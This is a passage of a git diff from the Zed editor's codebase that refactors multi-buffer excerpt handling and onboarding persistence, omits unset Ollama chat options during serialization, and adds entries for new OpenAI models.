buffer_snapshot.remote_id(); - loop { - let existing = if let Some(&existing_id) = existing_iter.peek() { - let locator = snapshot.excerpt_locator_for_id(existing_id); - excerpts_cursor.seek_forward(&Some(locator), Bias::Left); - if let Some(excerpt) = excerpts_cursor.item() { - if excerpt.buffer_id != buffer_snapshot.remote_id() { - to_remove.push(existing_id); - existing_iter.next(); - continue; - } - Some((existing_id, excerpt.range.context.to_point(buffer_snapshot))) - } else { - None - } - } else { - None + let mut snapshot = self.snapshot.get_mut(); + let mut cursor = snapshot + .excerpts + .cursor::>(()); + let mut new_excerpts = SumTree::new(()); + + let new_ranges = to_insert.clone(); + let mut to_insert = to_insert.iter().peekable(); + let mut patch = Patch::empty(); + let mut added_new_excerpt = false; + + new_excerpts.append(cursor.slice(&path_key, Bias::Left), ()); + + // handle the case where the path key used to be associated + // with a different buffer by removing its excerpts. 
+ if let Some(excerpt) = cursor.item() + && &excerpt.path_key == &path_key + && excerpt.buffer_id != buffer_id + { + let old_buffer_id = excerpt.buffer_id; + self.buffers.remove(&old_buffer_id); + snapshot.buffers.remove(&old_buffer_id); + remove_diff_state(&mut snapshot.diffs, old_buffer_id); + self.diffs.remove(&old_buffer_id); + let before = cursor.position.1; + cursor.seek_forward(&path_key, Bias::Right); + let after = cursor.position.1; + patch.push(Edit { + old: before..after, + new: new_excerpts.summary().len()..new_excerpts.summary().len(), + }); + cx.emit(Event::BuffersRemoved { + removed_buffer_ids: vec![old_buffer_id], + }); + } + + while let Some(excerpt) = cursor.item() + && excerpt.path_key == path_key + { + assert_eq!(excerpt.buffer_id, buffer_id); + let Some(next_excerpt) = to_insert.peek() else { + break; }; + if &excerpt.range == *next_excerpt { + let before = new_excerpts.summary().len(); + new_excerpts.update_last( + |prev_excerpt| { + if !prev_excerpt.has_trailing_newline { + prev_excerpt.has_trailing_newline = true; + patch.push(Edit { + old: cursor.position.1..cursor.position.1, + new: before..before + MultiBufferOffset(1), + }); + } + }, + (), + ); + new_excerpts.push(excerpt.clone(), ()); + to_insert.next(); + cursor.next(); + continue; + } - let new = new_iter.peek(); - // Try to merge the next new range or existing excerpt into the last - // queued insert. - if let Some((last_id, last)) = to_insert.last_mut() { - // Next new range overlaps the last queued insert: absorb it by - // extending the insert's end. - if let Some(new) = new - && last.context.end >= new.context.start - { - last.context.end = last.context.end.max(new.context.end); - excerpt_ids.push(*last_id); - new_iter.next(); - continue; - } - // Next existing excerpt overlaps the last queued insert: absorb - // it by extending the insert's end, and record the existing - // excerpt as replaced so anchors in it resolve to the new one. 
- if let Some((existing_id, existing_range)) = &existing - && last.context.end >= existing_range.start - { - last.context.end = last.context.end.max(existing_range.end); - to_remove.push(*existing_id); - Arc::make_mut(&mut self.snapshot.get_mut().replaced_excerpts) - .insert(*existing_id, *last_id); - existing_iter.next(); - continue; - } + if excerpt + .range + .context + .start + .cmp(&next_excerpt.context.start, &buffer_snapshot) + .is_le() + { + // remove old excerpt + let before = cursor.position.1; + cursor.next(); + let after = cursor.position.1; + patch.push(Edit { + old: before..after, + new: new_excerpts.summary().len()..new_excerpts.summary().len(), + }); + } else { + // insert new excerpt + let next_excerpt = to_insert.next().unwrap(); + added_new_excerpt = true; + let before = new_excerpts.summary().len(); + new_excerpts.update_last( + |prev_excerpt| { + prev_excerpt.has_trailing_newline = true; + }, + (), + ); + new_excerpts.push( + Excerpt::new( + path_key.clone(), + path_key_index, + &buffer_snapshot, + next_excerpt.clone(), + false, + ), + (), + ); + let after = new_excerpts.summary().len(); + patch.push_maybe_empty(Edit { + old: cursor.position.1..cursor.position.1, + new: before..after, + }); } + } - match (new, existing) { - (None, None) => break, + // remove any further trailing excerpts + let mut before = cursor.position.1; + cursor.seek_forward(&path_key, Bias::Right); + let after = cursor.position.1; + // if we removed the previous last excerpt, remove the trailing newline from the new last excerpt + if cursor.item().is_none() && to_insert.peek().is_none() { + new_excerpts.update_last( + |excerpt| { + if excerpt.has_trailing_newline { + before.0.0 = before + .0 + .0 + .checked_sub(1) + .expect("should have preceding excerpt"); + excerpt.has_trailing_newline = false; + } + }, + (), + ); + } + patch.push(Edit { + old: before..after, + new: new_excerpts.summary().len()..new_excerpts.summary().len(), + }); - // No more new ranges; remove the 
remaining existing excerpt. - (None, Some((existing_id, _))) => { - existing_iter.next(); - to_remove.push(existing_id); - } + while let Some(next_excerpt) = to_insert.next() { + added_new_excerpt = true; + let before = new_excerpts.summary().len(); + new_excerpts.update_last( + |prev_excerpt| { + prev_excerpt.has_trailing_newline = true; + }, + (), + ); + new_excerpts.push( + Excerpt::new( + path_key.clone(), + path_key_index, + &buffer_snapshot, + next_excerpt.clone(), + false, + ), + (), + ); + let after = new_excerpts.summary().len(); + patch.push_maybe_empty(Edit { + old: cursor.position.1..cursor.position.1, + new: before..after, + }); + } - // No more existing excerpts; queue the new range for insertion. - (Some(_), None) => { - added_a_new_excerpt = true; - let new_id = next_excerpt_id(); - excerpt_ids.push(new_id); - to_insert.push((new_id, new_iter.next().unwrap())); - } + let suffix_start = cursor.position.1; + let suffix = cursor.suffix(); + let changed_trailing_excerpt = suffix.is_empty(); + if !suffix.is_empty() { + let before = new_excerpts.summary().len(); + new_excerpts.update_last( + |prev_excerpt| { + if !prev_excerpt.has_trailing_newline { + prev_excerpt.has_trailing_newline = true; + patch.push(Edit { + old: suffix_start..suffix_start, + new: before..before + MultiBufferOffset(1), + }); + } + }, + (), + ); + } + new_excerpts.append(suffix, ()); + drop(cursor); + + snapshot.excerpts = new_excerpts; + snapshot.buffers.insert( + buffer_id, + BufferStateSnapshot { + path_key: path_key.clone(), + path_key_index, + buffer_snapshot: buffer_snapshot.clone(), + }, + ); + + self.buffers.entry(buffer_id).or_insert_with(|| { + self.buffer_changed_since_sync.replace(true); + buffer.update(cx, |buffer, _| { + buffer.record_changes(Rc::downgrade(&self.buffer_changed_since_sync)); + }); + BufferState { + _subscriptions: [ + cx.observe(&buffer, |_, _, cx| cx.notify()), + cx.subscribe(&buffer, Self::on_buffer_event), + ], + buffer: buffer.clone(), + } + }); - // 
Existing excerpt ends before the new range starts, so it - // has no corresponding new range and must be removed. Flush - // pending inserts and advance `insert_after` past it so that - // future inserts receive locators *after* this excerpt's - // locator, preserving forward ordering. - (Some(new), Some((_, existing_range))) - if existing_range.end < new.context.start => - { - self.insert_excerpts_with_ids_after( - insert_after, - buffer.clone(), - mem::take(&mut to_insert), - cx, - ); - insert_after = existing_iter.next().unwrap(); - to_remove.push(insert_after); - } - // New range ends before the existing excerpt starts, so the - // new range has no corresponding existing excerpt. Queue it - // for insertion at the current `insert_after` position - // (before the existing excerpt), which is the correct - // spatial ordering. - (Some(new), Some((_, existing_range))) - if existing_range.start > new.context.end => - { - let new_id = next_excerpt_id(); - excerpt_ids.push(new_id); - to_insert.push((new_id, new_iter.next().unwrap())); - } - // Exact match: keep the existing excerpt in place, flush - // any pending inserts before it, and use it as the new - // `insert_after` anchor. - (Some(new), Some((_, existing_range))) - if existing_range.start == new.context.start - && existing_range.end == new.context.end => - { - self.insert_excerpts_with_ids_after( - insert_after, - buffer.clone(), - mem::take(&mut to_insert), - cx, - ); - insert_after = existing_iter.next().unwrap(); - excerpt_ids.push(insert_after); - new_iter.next(); - } + if changed_trailing_excerpt { + snapshot.trailing_excerpt_update_count += 1; + } - // Partial overlap: replace the existing excerpt with a new - // one whose range is the union of both, and record the - // replacement so that anchors in the old excerpt resolve to - // the new one. 
- (Some(_), Some((_, existing_range))) => { - let existing_id = existing_iter.next().unwrap(); - let new_id = next_excerpt_id(); - Arc::make_mut(&mut self.snapshot.get_mut().replaced_excerpts) - .insert(existing_id, new_id); - to_remove.push(existing_id); - let mut range = new_iter.next().unwrap(); - range.context.start = range.context.start.min(existing_range.start); - range.context.end = range.context.end.max(existing_range.end); - excerpt_ids.push(new_id); - to_insert.push((new_id, range)); - } - }; + let edits = Self::sync_diff_transforms( + &mut snapshot, + patch.into_inner(), + DiffChangeKind::BufferEdited, + ); + if !edits.is_empty() { + self.subscriptions.publish(edits); } - self.insert_excerpts_with_ids_after(insert_after, buffer, to_insert, cx); - // todo(lw): There is a logic bug somewhere that causes the to_remove vector to be not ordered correctly - to_remove.sort_by_cached_key(|&id| snapshot.excerpt_locator_for_id(id)); - self.remove_excerpts(to_remove, cx); + cx.emit(Event::Edited { + edited_buffer: None, + is_local: true, + }); + cx.emit(Event::BufferRangesUpdated { + buffer, + path_key: path_key.clone(), + ranges: new_ranges, + }); + cx.notify(); - if excerpt_ids.is_empty() { - self.excerpts_by_path.remove(&path); - } else { - let snapshot = &*self.snapshot.get_mut(); - let excerpt_ids = excerpt_ids - .iter() - .dedup() - .cloned() - // todo(lw): There is a logic bug somewhere that causes excerpt_ids to not necessarily be in order by locator - .sorted_by_cached_key(|&id| snapshot.excerpt_locator_for_id(id)) - .collect(); - for &excerpt_id in &excerpt_ids { - self.paths_by_excerpt.insert(excerpt_id, path.clone()); - } - self.excerpts_by_path.insert(path, excerpt_ids); + added_new_excerpt + } + + pub fn remove_excerpts_for_buffer(&mut self, buffer: BufferId, cx: &mut Context) { + let snapshot = self.sync_mut(cx); + let Some(path) = snapshot.path_for_buffer(buffer).cloned() else { + return; + }; + self.remove_excerpts(path, cx); + } + + pub fn 
remove_excerpts(&mut self, path: PathKey, cx: &mut Context) { + assert_eq!(self.history.transaction_depth(), 0); + self.sync_mut(cx); + + let mut snapshot = self.snapshot.get_mut(); + let mut cursor = snapshot + .excerpts + .cursor::>(()); + let mut new_excerpts = SumTree::new(()); + new_excerpts.append(cursor.slice(&path, Bias::Left), ()); + let mut edit_start = cursor.position.1; + let mut buffer_id = None; + if let Some(excerpt) = cursor.item() + && excerpt.path_key == path + { + buffer_id = Some(excerpt.buffer_id); } + cursor.seek(&path, Bias::Right); + let edit_end = cursor.position.1; + let suffix = cursor.suffix(); + let changed_trailing_excerpt = suffix.is_empty(); + new_excerpts.append(suffix, ()); + + if let Some(buffer_id) = buffer_id { + snapshot.buffers.remove(&buffer_id); + remove_diff_state(&mut snapshot.diffs, buffer_id); + self.buffers.remove(&buffer_id); + self.diffs.remove(&buffer_id); + cx.emit(Event::BuffersRemoved { + removed_buffer_ids: vec![buffer_id], + }) + } + drop(cursor); + if changed_trailing_excerpt { + snapshot.trailing_excerpt_update_count += 1; + new_excerpts.update_last( + |excerpt| { + if excerpt.has_trailing_newline { + excerpt.has_trailing_newline = false; + edit_start.0.0 = edit_start + .0 + .0 + .checked_sub(1) + .expect("should have at least one excerpt"); + } + }, + (), + ) + } + + let edit = Edit { + old: edit_start..edit_end, + new: edit_start..edit_start, + }; + snapshot.excerpts = new_excerpts; - PathExcerptInsertResult { - excerpt_ids, - added_new_excerpt: added_a_new_excerpt, + let edits = + Self::sync_diff_transforms(&mut snapshot, vec![edit], DiffChangeKind::BufferEdited); + if !edits.is_empty() { + self.subscriptions.publish(edits); } + + cx.emit(Event::Edited { + edited_buffer: None, + is_local: true, + }); + cx.notify(); } } diff --git a/crates/multi_buffer/src/transaction.rs b/crates/multi_buffer/src/transaction.rs index a65e394c8f1834a95ccbc70532aa03d2a3e6e34c..a3afe55cd6928b9e908d0249af5fb8fe7fc4bbe4 100644 
--- a/crates/multi_buffer/src/transaction.rs +++ b/crates/multi_buffer/src/transaction.rs @@ -2,15 +2,15 @@ use gpui::{App, Context, Entity}; use language::{self, Buffer, TransactionId}; use std::{ collections::HashMap, - ops::{AddAssign, Range, Sub}, + ops::Range, time::{Duration, Instant}, }; use sum_tree::Bias; use text::BufferId; -use crate::{BufferState, MultiBufferDimension}; +use crate::{Anchor, BufferState, MultiBufferOffset}; -use super::{Event, ExcerptSummary, MultiBuffer}; +use super::{Event, MultiBuffer}; #[derive(Clone)] pub(super) struct History { @@ -314,71 +314,50 @@ impl MultiBuffer { } } - pub fn edited_ranges_for_transaction( + pub fn edited_ranges_for_transaction( &self, transaction_id: TransactionId, cx: &App, - ) -> Vec> - where - D: MultiBufferDimension - + Ord - + Sub - + AddAssign, - D::TextDimension: PartialOrd + Sub, - { + ) -> Vec> { let Some(transaction) = self.history.transaction(transaction_id) else { return Vec::new(); }; - let mut ranges = Vec::new(); let snapshot = self.read(cx); - let mut cursor = snapshot.excerpts.cursor::(()); + let mut buffer_anchors = Vec::new(); for (buffer_id, buffer_transaction) in &transaction.buffer_transactions { - let Some(buffer_state) = self.buffers.get(buffer_id) else { + let Some(buffer) = self.buffer(*buffer_id) else { continue; }; + let Some(excerpt) = snapshot.first_excerpt_for_buffer(*buffer_id) else { + continue; + }; + let buffer_snapshot = buffer.read(cx).snapshot(); - let buffer = buffer_state.buffer.read(cx); - for range in - buffer.edited_ranges_for_transaction_id::(*buffer_transaction) + for range in buffer + .read(cx) + .edited_ranges_for_transaction_id::(*buffer_transaction) { - for excerpt_id in &buffer_state.excerpts { - cursor.seek(excerpt_id, Bias::Left); - if let Some(excerpt) = cursor.item() - && excerpt.locator == *excerpt_id - { - let excerpt_buffer_start = excerpt - .range - .context - .start - .summary::(buffer); - let excerpt_buffer_end = excerpt - .range - .context - .end - 
.summary::(buffer); - let excerpt_range = excerpt_buffer_start..excerpt_buffer_end; - if excerpt_range.contains(&range.start) - && excerpt_range.contains(&range.end) - { - let excerpt_start = D::from_summary(&cursor.start().text); - - let mut start = excerpt_start; - start += range.start - excerpt_buffer_start; - let mut end = excerpt_start; - end += range.end - excerpt_buffer_start; - - ranges.push(start..end); - break; - } - } - } + buffer_anchors.push(Anchor::in_buffer( + excerpt.path_key_index, + buffer_snapshot.anchor_at(range.start, Bias::Left), + )); + buffer_anchors.push(Anchor::in_buffer( + excerpt.path_key_index, + buffer_snapshot.anchor_at(range.end, Bias::Right), + )); } } + buffer_anchors.sort_unstable_by(|a, b| a.cmp(b, &snapshot)); - ranges.sort_by_key(|range| range.start); - ranges + snapshot + .summaries_for_anchors(buffer_anchors.iter()) + .as_chunks::<2>() + .0 + .iter() + .map(|&[s, e]| s..e) + .collect::>() } pub fn merge_transactions( diff --git a/crates/notifications/Cargo.toml b/crates/notifications/Cargo.toml index 8304c788fdd1ca840d68dbb4eb24bf5e3e79abdc..e0640c67cc55b3c2ba742e762d0e7a1e9d414c40 100644 --- a/crates/notifications/Cargo.toml +++ b/crates/notifications/Cargo.toml @@ -15,7 +15,7 @@ doctest = false [features] test-support = [ "channel/test-support", - "collections/test-support", + "gpui/test-support", "rpc/test-support", ] @@ -37,8 +37,6 @@ zed_actions.workspace = true [dev-dependencies] client = { workspace = true, features = ["test-support"] } -collections = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } rpc = { workspace = true, features = ["test-support"] } -settings = { workspace = true, features = ["test-support"] } util = { workspace = true, features = ["test-support"] } diff --git a/crates/ollama/src/ollama.rs b/crates/ollama/src/ollama.rs index dd439bc5d690c308828ca7be491efdf751a9a09c..bae8212d34891a79107c42cb445088a55fbf3f4f 100644 --- 
a/crates/ollama/src/ollama.rs +++ b/crates/ollama/src/ollama.rs @@ -123,10 +123,15 @@ pub struct ChatRequest { // https://github.com/ollama/ollama/blob/main/docs/modelfile.md#valid-parameters-and-values #[derive(Serialize, Default, Debug)] pub struct ChatOptions { + #[serde(skip_serializing_if = "Option::is_none")] pub num_ctx: Option, + #[serde(skip_serializing_if = "Option::is_none")] pub num_predict: Option, + #[serde(skip_serializing_if = "Option::is_none")] pub stop: Option>, + #[serde(skip_serializing_if = "Option::is_none")] pub temperature: Option, + #[serde(skip_serializing_if = "Option::is_none")] pub top_p: Option, } @@ -588,4 +593,96 @@ mod tests { assert_eq!(message_images.len(), 1); assert_eq!(message_images[0].as_str().unwrap(), base64_image); } + + #[test] + fn test_chat_options_serialization() { + // When stop is None, it should not appear in JSON at all + // This allows Ollama to use the model's default stop tokens + let options_no_stop = ChatOptions { + num_ctx: Some(4096), + stop: None, + temperature: Some(0.7), + ..Default::default() + }; + let serialized = serde_json::to_string(&options_no_stop).unwrap(); + assert!( + !serialized.contains("stop"), + "stop should not be in JSON when None" + ); + assert!(serialized.contains("num_ctx")); + assert!(serialized.contains("temperature")); + + // When stop has values, they should be serialized + let options_with_stop = ChatOptions { + stop: Some(vec!["<|eot_id|>".to_string()]), + ..Default::default() + }; + let serialized = serde_json::to_string(&options_with_stop).unwrap(); + assert!(serialized.contains("stop")); + assert!(serialized.contains("<|eot_id|>")); + + // All None options should result in empty object + let options_all_none = ChatOptions::default(); + let serialized = serde_json::to_string(&options_all_none).unwrap(); + assert_eq!(serialized, "{}"); + } + + #[test] + fn test_chat_request_with_stop_tokens() { + let request = ChatRequest { + model: "rnj-1:8b".to_string(), + messages: 
vec![ChatMessage::User { + content: "Hello".to_string(), + images: None, + }], + stream: true, + keep_alive: KeepAlive::default(), + options: Some(ChatOptions { + stop: Some(vec!["<|eot_id|>".to_string(), "<|end|>".to_string()]), + ..Default::default() + }), + think: None, + tools: vec![], + }; + + let serialized = serde_json::to_string(&request).unwrap(); + let parsed: serde_json::Value = serde_json::from_str(&serialized).unwrap(); + + let stop = parsed["options"]["stop"].as_array().unwrap(); + assert_eq!(stop.len(), 2); + assert_eq!(stop[0].as_str().unwrap(), "<|eot_id|>"); + assert_eq!(stop[1].as_str().unwrap(), "<|end|>"); + } + + #[test] + fn test_chat_request_without_stop_tokens_omits_field() { + // This tests the fix for issue #47798 + // When no stop tokens are provided, the field should be omitted + // so Ollama uses the model's default stop tokens from Modelfile + let request = ChatRequest { + model: "rnj-1:8b".to_string(), + messages: vec![ChatMessage::User { + content: "Hello".to_string(), + images: None, + }], + stream: true, + keep_alive: KeepAlive::default(), + options: Some(ChatOptions { + num_ctx: Some(4096), + stop: None, // No stop tokens - should be omitted from JSON + ..Default::default() + }), + think: None, + tools: vec![], + }; + + let serialized = serde_json::to_string(&request).unwrap(); + + // The key check: "stop" should not appear in the serialized JSON + assert!( + !serialized.contains("\"stop\""), + "stop field should be omitted when None, got: {}", + serialized + ); + } } diff --git a/crates/onboarding/Cargo.toml b/crates/onboarding/Cargo.toml index e5e5b5cac93aa4021f8933bd38f8711d53b89902..545a4b614160054186d4acf7bce17e36ac1cd4f1 100644 --- a/crates/onboarding/Cargo.toml +++ b/crates/onboarding/Cargo.toml @@ -32,6 +32,7 @@ serde.workspace = true settings.workspace = true telemetry.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true vim_mode_setting.workspace = true diff 
--git a/crates/onboarding/src/basics_page.rs b/crates/onboarding/src/basics_page.rs index b683b13743819bbba692a99a7c559cfd9823a4b4..b2e595b28a33ed4ee7f066c4d969baffdb2a081b 100644 --- a/crates/onboarding/src/basics_page.rs +++ b/crates/onboarding/src/basics_page.rs @@ -5,14 +5,11 @@ use fs::Fs; use gpui::{Action, App, IntoElement}; use project::project_settings::ProjectSettings; use settings::{BaseKeymap, Settings, update_settings_file}; -use theme::{ - Appearance, SystemAppearance, ThemeAppearanceMode, ThemeName, ThemeRegistry, ThemeSelection, - ThemeSettings, -}; +use theme::{Appearance, SystemAppearance, ThemeRegistry}; +use theme_settings::{ThemeAppearanceMode, ThemeName, ThemeSelection, ThemeSettings}; use ui::{ - Divider, ParentElement as _, StatefulInteractiveElement, SwitchField, TintColor, - ToggleButtonGroup, ToggleButtonGroupSize, ToggleButtonSimple, ToggleButtonWithIcon, Tooltip, - prelude::*, rems_from_px, + Divider, StatefulInteractiveElement, SwitchField, TintColor, ToggleButtonGroup, + ToggleButtonGroupSize, ToggleButtonSimple, ToggleButtonWithIcon, Tooltip, prelude::*, }; use vim_mode_setting::VimModeSetting; @@ -198,7 +195,7 @@ fn render_theme_section(tab_index: &mut isize, cx: &mut App) -> impl IntoElement fn write_mode_change(mode: ThemeAppearanceMode, cx: &mut App) { let fs = ::global(cx); update_settings_file(fs, cx, move |settings, _cx| { - theme::set_mode(settings, mode); + theme_settings::set_mode(settings, mode); }); } @@ -220,13 +217,13 @@ fn render_theme_section(tab_index: &mut isize, cx: &mut App) -> impl IntoElement dark: ThemeName(dark_theme.into()), }); } - ThemeAppearanceMode::Light => theme::set_theme( + ThemeAppearanceMode::Light => theme_settings::set_theme( settings, theme, Appearance::Light, *SystemAppearance::global(cx), ), - ThemeAppearanceMode::Dark => theme::set_theme( + ThemeAppearanceMode::Dark => theme_settings::set_theme( settings, theme, Appearance::Dark, @@ -477,8 +474,7 @@ fn render_setting_import_button( 
.toggle_state(imported) .tab_index(tab_index) .when(imported, |this| { - this.icon(IconName::Check) - .icon_size(IconSize::Small) + this.end_icon(Icon::new(IconName::Check).size(IconSize::Small)) .color(Color::Success) }) .on_click(move |_, window, cx| { diff --git a/crates/onboarding/src/multibuffer_hint.rs b/crates/onboarding/src/multibuffer_hint.rs index 26ab409fbad6333f2e56ee4a274a43806adce676..56092863c8b5ae1a18694a23419fc2127c5bdc81 100644 --- a/crates/onboarding/src/multibuffer_hint.rs +++ b/crates/onboarding/src/multibuffer_hint.rs @@ -2,7 +2,7 @@ use std::collections::HashSet; use std::sync::OnceLock; use std::sync::atomic::{AtomicUsize, Ordering}; -use db::kvp::KEY_VALUE_STORE; +use db::kvp::KeyValueStore; use gpui::{App, EntityId, EventEmitter, Subscription}; use ui::{IconButtonShape, Tooltip, prelude::*}; use workspace::item::{ItemBufferKind, ItemEvent, ItemHandle}; @@ -35,10 +35,10 @@ impl MultibufferHint { } impl MultibufferHint { - fn counter() -> &'static AtomicUsize { + fn counter(cx: &App) -> &'static AtomicUsize { static SHOWN_COUNT: OnceLock = OnceLock::new(); SHOWN_COUNT.get_or_init(|| { - let value: usize = KEY_VALUE_STORE + let value: usize = KeyValueStore::global(cx) .read_kvp(SHOWN_COUNT_KEY) .ok() .flatten() @@ -49,19 +49,21 @@ impl MultibufferHint { }) } - fn shown_count() -> usize { - Self::counter().load(Ordering::Relaxed) + fn shown_count(cx: &App) -> usize { + Self::counter(cx).load(Ordering::Relaxed) } fn increment_count(cx: &mut App) { - Self::set_count(Self::shown_count() + 1, cx) + Self::set_count(Self::shown_count(cx) + 1, cx) } pub(crate) fn set_count(count: usize, cx: &mut App) { - Self::counter().store(count, Ordering::Relaxed); + Self::counter(cx).store(count, Ordering::Relaxed); - db::write_and_log(cx, move || { - KEY_VALUE_STORE.write_kvp(SHOWN_COUNT_KEY.to_string(), format!("{}", count)) + let kvp = KeyValueStore::global(cx); + db::write_and_log(cx, move || async move { + kvp.write_kvp(SHOWN_COUNT_KEY.to_string(), 
format!("{}", count)) + .await }); } @@ -71,7 +73,7 @@ impl MultibufferHint { /// Determines the toolbar location for this [`MultibufferHint`]. fn determine_toolbar_location(&mut self, cx: &mut Context) -> ToolbarItemLocation { - if Self::shown_count() >= NUMBER_OF_HINTS { + if Self::shown_count(cx) >= NUMBER_OF_HINTS { return ToolbarItemLocation::Hidden; } @@ -158,10 +160,11 @@ impl Render for MultibufferHint { ) .child( Button::new("open_docs", "Learn More") - .icon(IconName::ArrowUpRight) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) - .icon_position(IconPosition::End) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click(move |_event, _, cx| { cx.open_url("https://zed.dev/docs/multibuffers") }), diff --git a/crates/onboarding/src/onboarding.rs b/crates/onboarding/src/onboarding.rs index 68748afbd62a54fb33060b2812d8977ee94ee46d..808cba456406f915bdd9f593a6647ea3e90c696d 100644 --- a/crates/onboarding/src/onboarding.rs +++ b/crates/onboarding/src/onboarding.rs @@ -1,6 +1,6 @@ use crate::multibuffer_hint::MultibufferHint; use client::{Client, UserStore, zed_urls}; -use db::kvp::KEY_VALUE_STORE; +use db::kvp::KeyValueStore; use fs::Fs; use gpui::{ Action, AnyElement, App, AppContext, AsyncWindowContext, Context, Entity, EventEmitter, @@ -194,8 +194,10 @@ pub fn show_onboarding_view(app_state: Arc, cx: &mut App) -> Task gpui::Task>> { + let db = persistence::OnboardingPagesDb::global(cx); window.spawn(cx, async move |cx| { - if let Some(_) = - persistence::ONBOARDING_PAGES.get_onboarding_page(item_id, workspace_id)? - { + if let Some(_) = db.get_onboarding_page(item_id, workspace_id)? 
{ workspace.update(cx, |workspace, cx| Onboarding::new(workspace, cx)) } else { Err(anyhow::anyhow!("No onboarding page to deserialize")) @@ -593,11 +594,12 @@ impl workspace::SerializableItem for Onboarding { ) -> Option>> { let workspace_id = workspace.database_id()?; - Some(cx.background_spawn(async move { - persistence::ONBOARDING_PAGES - .save_onboarding_page(item_id, workspace_id) - .await - })) + let db = persistence::OnboardingPagesDb::global(cx); + Some( + cx.background_spawn( + async move { db.save_onboarding_page(item_id, workspace_id).await }, + ), + ) } fn should_serialize(&self, event: &Self::Event) -> bool { @@ -646,7 +648,7 @@ mod persistence { ]; } - db::static_connection!(ONBOARDING_PAGES, OnboardingPagesDb, [WorkspaceDb]); + db::static_connection!(OnboardingPagesDb, [WorkspaceDb]); impl OnboardingPagesDb { query! { diff --git a/crates/onboarding/src/theme_preview.rs b/crates/onboarding/src/theme_preview.rs index 8bd65d8a2707acdc53333071486f41741398a82a..602695cca6a643d4eb4d3476286bba7fcfe74c40 100644 --- a/crates/onboarding/src/theme_preview.rs +++ b/crates/onboarding/src/theme_preview.rs @@ -87,13 +87,13 @@ impl ThemePreviewTile { let colors = theme.colors(); let syntax = theme.syntax(); - let keyword_color = syntax.get("keyword").color; - let function_color = syntax.get("function").color; - let string_color = syntax.get("string").color; - let comment_color = syntax.get("comment").color; - let variable_color = syntax.get("variable").color; - let type_color = syntax.get("type").color; - let punctuation_color = syntax.get("punctuation").color; + let keyword_color = syntax.style_for_name("keyword").and_then(|s| s.color); + let function_color = syntax.style_for_name("function").and_then(|s| s.color); + let string_color = syntax.style_for_name("string").and_then(|s| s.color); + let comment_color = syntax.style_for_name("comment").and_then(|s| s.color); + let variable_color = syntax.style_for_name("variable").and_then(|s| s.color); + let type_color = 
syntax.style_for_name("type").and_then(|s| s.color); + let punctuation_color = syntax.style_for_name("punctuation").and_then(|s| s.color); let syntax_colors = [ keyword_color, diff --git a/crates/open_ai/src/open_ai.rs b/crates/open_ai/src/open_ai.rs index e6145e409058a3fe453c4557b2a32cccf6baf16c..c4a3e078d76eb028b90e5b80fe95b1281b795f34 100644 --- a/crates/open_ai/src/open_ai.rs +++ b/crates/open_ai/src/open_ai.rs @@ -90,6 +90,10 @@ pub enum Model { FivePointTwoCodex, #[serde(rename = "gpt-5.3-codex")] FivePointThreeCodex, + #[serde(rename = "gpt-5.4")] + FivePointFour, + #[serde(rename = "gpt-5.4-pro")] + FivePointFourPro, #[serde(rename = "custom")] Custom { name: String, @@ -131,6 +135,8 @@ impl Model { "gpt-5.2" => Ok(Self::FivePointTwo), "gpt-5.2-codex" => Ok(Self::FivePointTwoCodex), "gpt-5.3-codex" => Ok(Self::FivePointThreeCodex), + "gpt-5.4" => Ok(Self::FivePointFour), + "gpt-5.4-pro" => Ok(Self::FivePointFourPro), invalid_id => anyhow::bail!("invalid model id '{invalid_id}'"), } } @@ -153,6 +159,8 @@ impl Model { Self::FivePointTwo => "gpt-5.2", Self::FivePointTwoCodex => "gpt-5.2-codex", Self::FivePointThreeCodex => "gpt-5.3-codex", + Self::FivePointFour => "gpt-5.4", + Self::FivePointFourPro => "gpt-5.4-pro", Self::Custom { name, .. } => name, } } @@ -175,6 +183,8 @@ impl Model { Self::FivePointTwo => "gpt-5.2", Self::FivePointTwoCodex => "gpt-5.2-codex", Self::FivePointThreeCodex => "gpt-5.3-codex", + Self::FivePointFour => "gpt-5.4", + Self::FivePointFourPro => "gpt-5.4-pro", Self::Custom { display_name, .. 
} => display_name.as_deref().unwrap_or(&self.id()), } } @@ -191,12 +201,14 @@ impl Model { Self::O3 => 200_000, Self::Five => 272_000, Self::FiveCodex => 272_000, - Self::FiveMini => 272_000, - Self::FiveNano => 272_000, + Self::FiveMini => 400_000, + Self::FiveNano => 400_000, Self::FivePointOne => 400_000, Self::FivePointTwo => 400_000, Self::FivePointTwoCodex => 400_000, Self::FivePointThreeCodex => 400_000, + Self::FivePointFour => 1_050_000, + Self::FivePointFourPro => 1_050_000, Self::Custom { max_tokens, .. } => *max_tokens, } } @@ -222,6 +234,8 @@ impl Model { Self::FivePointTwo => Some(128_000), Self::FivePointTwoCodex => Some(128_000), Self::FivePointThreeCodex => Some(128_000), + Self::FivePointFour => Some(128_000), + Self::FivePointFourPro => Some(128_000), } } @@ -230,7 +244,7 @@ impl Model { Self::Custom { reasoning_effort, .. } => reasoning_effort.to_owned(), - Self::FivePointThreeCodex => Some(ReasoningEffort::Medium), + Self::FivePointThreeCodex | Self::FivePointFourPro => Some(ReasoningEffort::Medium), _ => None, } } @@ -241,7 +255,10 @@ impl Model { supports_chat_completions, .. } => *supports_chat_completions, - Self::FiveCodex | Self::FivePointTwoCodex | Self::FivePointThreeCodex => false, + Self::FiveCodex + | Self::FivePointTwoCodex + | Self::FivePointThreeCodex + | Self::FivePointFourPro => false, _ => true, } } @@ -263,6 +280,8 @@ impl Model { | Self::FivePointTwo | Self::FivePointTwoCodex | Self::FivePointThreeCodex + | Self::FivePointFour + | Self::FivePointFourPro | Self::FiveNano => true, Self::O1 | Self::O3 | Self::O3Mini | Model::Custom { .. 
